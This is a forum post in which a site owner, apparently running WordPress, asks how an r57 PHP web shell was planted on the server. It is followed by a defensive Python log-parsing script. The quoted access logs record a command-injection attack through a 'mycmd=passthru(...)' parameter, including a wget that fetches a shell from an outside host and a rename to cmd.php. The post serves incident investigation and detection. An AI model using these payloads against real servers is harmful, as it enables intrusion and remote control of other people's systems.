New Exploit?
Hey, just wondering if anybody has experienced this before…
Last night I was alerted that my server was down, got it rebooted and tried to figure out what happened.
Looks like somehow somebody got r57 shell uploaded to my server.
Looking through my access logs:
80.218.10.244 - - [14/Feb/2008:20:54:25 +0000] "GET /?mycmd=passthru("id"); HTTP/1.0" 200 19911 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:54:28 +0000] "GET /?mycmd=passthru("uname+-a"); HTTP/1.0" 200 19958 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:54:33 +0000] "GET /?mycmd=passthru("w"); HTTP/1.0" 200 20145 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:54:42 +0000] "GET /?mycmd=passthru("pwd"); HTTP/1.0" 200 19896 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:54:46 +0000] "GET /?mycmd=passthru("ls+-lah"); HTTP/1.0" 200 22356 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:54:58 +0000] "GET /?mycmd=passthru("wget+coded.altervista.org%2Fcmd.txt"); HTTP/1.0" 200 19857 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:55:11 +0000] "GET /cmd.txt HTTP/1.1" 200 98799 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"
80.218.10.244 - - [14/Feb/2008:20:55:21 +0000] "GET /?mycmd=passthru("mv+cmd.txt+cmd.php"); HTTP/1.0" 200 19857 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:55:26 +0000] "GET /cmd.php HTTP/1.1" 200 36414 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"
80.218.10.244 - - [14/Feb/2008:20:56:20 +0000] "POST /cmd.php HTTP/1.1" 200 33523 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"
Any ideas where the mycmd stuff is done? I can’t find it by doing a recursive grep.
And I can’t recreate this doing it myself. Any ideas??
I’ve updated to 2.3.3 this morning.
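As an added example (not code from the post or from WordPress), here is a defender-side script that parses access-log lines like the ones above, flags query values that carry a PHP exec/eval call such as the `mycmd=passthru(...)` requests, and ties the `wget`/`mv` commands to the later direct hits on the dropped file. The sample input is the post's own log entries with ASCII quotes restored, plus one constructed benign request; the regexes and function names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log; the target is matched lazily up to the protocol token so the attacker's unescaped quotes do not break parsing.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
                    r'(?P<target>.*?) HTTP/\d\.\d" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# A PHP exec/eval call inside a decoded query value means the application evaluated the input.
EXEC_RE = re.compile(r'\b(passthru|system|exec|shell_exec|popen|eval)\s*\(\s*["\']?(.*?)["\']?\s*\)')
# Sample input: log lines from the post (ASCII quotes restored) plus one constructed benign request.
SAMPLE_LOG = [
    '80.218.10.244 - - [14/Feb/2008:20:54:25 +0000] "GET /?mycmd=passthru("id"); HTTP/1.0" 200 19911 "-" "Snoopy v1.2.3"',
    '80.218.10.244 - - [14/Feb/2008:20:54:58 +0000] "GET /?mycmd=passthru("wget+coded.altervista.org%2Fcmd.txt"); HTTP/1.0" 200 19857 "-" "Snoopy v1.2.3"',
    '80.218.10.244 - - [14/Feb/2008:20:55:11 +0000] "GET /cmd.txt HTTP/1.1" 200 98799 "-" "Mozilla/5.0 (X11; U; Linux i686) Firefox/2.0.0.11"',
    '80.218.10.244 - - [14/Feb/2008:20:55:21 +0000] "GET /?mycmd=passthru("mv+cmd.txt+cmd.php"); HTTP/1.0" 200 19857 "-" "Snoopy v1.2.3"',
    '80.218.10.244 - - [14/Feb/2008:20:55:26 +0000] "GET /cmd.php HTTP/1.1" 200 36414 "-" "Mozilla/5.0 (X11; U; Linux i686) Firefox/2.0.0.11"',
    '80.218.10.244 - - [14/Feb/2008:20:56:20 +0000] "POST /cmd.php HTTP/1.1" 200 33523 "-" "Mozilla/5.0 (X11; U; Linux i686) Firefox/2.0.0.11"',
    '192.0.2.7 - - [14/Feb/2008:21:00:00 +0000] "GET /?p=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',  # constructed, benign
]

def parsed(lines):
    """Yield the fields of every line that matches the combined log format."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def find_exec_attempts(lines):
    """One record per request whose query string carries a PHP exec/eval call."""
    hits = []
    for rec in parsed(lines):
        for param, values in parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True).items():
            for value in values:  # parse_qs has already decoded %2F and '+'
                m = EXEC_RE.search(value)
                if m:
                    hits.append({"ip": rec["ip"], "ts": rec["ts"], "param": param, "func": m.group(1), "cmd": m.group(2)})
    return hits

def dropped_files(hits):
    """Web-root file names the executed commands leave behind (wget target, mv destination)."""
    names = set()
    for argv in (h["cmd"].split() for h in hits):
        if len(argv) >= 2 and argv[0] == "wget":
            names.add(argv[-1].rsplit("/", 1)[-1])
        elif len(argv) == 3 and argv[0] == "mv":
            names.add(argv[2])
    return names

def follow_on_requests(lines, names):
    """Direct requests to the dropped files, i.e. the planted shell being used."""
    return [(r["ts"], r["method"], r["target"], r["status"])
            for r in parsed(lines) if urlsplit(r["target"]).path.lstrip("/") in names]
```

Running `find_exec_attempts` over a full day of logs and then `follow_on_requests` on the resulting file names gives the timeline of the planted shell's use, which is the evidence to preserve before cleaning up; the flagged parameter name is also the string to grep the PHP code and the database (themes, plugins, option values) for, since an `eval` of `$_GET['mycmd']` is what such a request implies.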